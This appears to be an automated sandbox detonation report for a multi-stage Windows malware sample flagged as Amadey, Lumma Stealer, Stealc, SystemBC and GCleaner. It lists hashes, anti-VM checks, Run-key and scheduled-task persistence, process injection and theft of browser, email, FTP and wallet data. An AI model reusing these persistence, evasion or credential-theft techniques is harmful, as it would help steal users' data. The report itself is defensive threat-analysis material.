| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | e1bf87195c3b140dd67bfd6be1bfc089 |
| SHA1 | 5b383cd439b0c8931f2c3656d549dc1a9d66ab60 |
| SHA256 | cee9bea1e681e859e0dd39c0c1e1f242572e2e3b9cf0b84ffaa4ca1da7b4a0b4 |
| SHA512 | c2ddaca5cc1af9819f8613fa43c012c74d7292729a2d888d2a51513a7ffbf223cb534e64f4f9f5e0fd4d409fca672106e34d3cabcfaf4ee7c67fa5f09062e2bd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 1ea5a5d84dce5c715a07e64e743bc88c |
| SHA1 | c83b993da9aedaa86ffad66e4dbce0a02525e6af |
| SHA256 | a3a09906137ff4a94cf8d91eb925d84bee69a45b805797ab6bb3850db6ef216e |
| SHA512 | 409b4642388c165465854f68dcc071fa0e6c4f7e56efa18f549eb4b2df459627b240c1c902faf848f86a33c250328078168ba4e17ed5a19d62b0b0263931ed07 |
Analysis: behavioral15
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win10v2004-20250217-en
Max time kernel
147s
Max time network
151s
Command Line
Signatures
Amadey
Amadey family
GCleaner
Gcleaner family
Lumma Stealer, LummaC
Lumma family
Stealc
Stealc family
SystemBC
Systembc family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\eltqgcf\oamb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10036400101\08a8bb090e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10036420101\b59e2e872a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10036400101\08a8bb090e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10036400101\08a8bb090e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\eltqgcf\oamb.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10036420101\b59e2e872a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\eltqgcf\oamb.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10036420101\b59e2e872a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10036400101\08a8bb090e.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\ProgramData\eltqgcf\oamb.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10036420101\b59e2e872a.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9e28748818.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035810101\\9e28748818.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035820121\\am_no.cmd" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks installed software on the system
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10036400101\08a8bb090e.exe | N/A |
| N/A | N/A | C:\ProgramData\eltqgcf\oamb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10036420101\b59e2e872a.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5212 set thread context of 3840 | N/A | C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 2236 set thread context of 4512 | N/A | C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe | C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe |
| PID 2720 set thread context of 3904 | N/A | C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10036400101\08a8bb090e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\eltqgcf\oamb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10036430101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempNIKU2KFNSI0OSCJ5SNYFIAJYHYQOJDXS.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10036420101\b59e2e872a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10035810101\9e28748818.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133850860752177191" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10035810101\9e28748818.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10035810101\9e28748818.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10035810101\9e28748818.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe
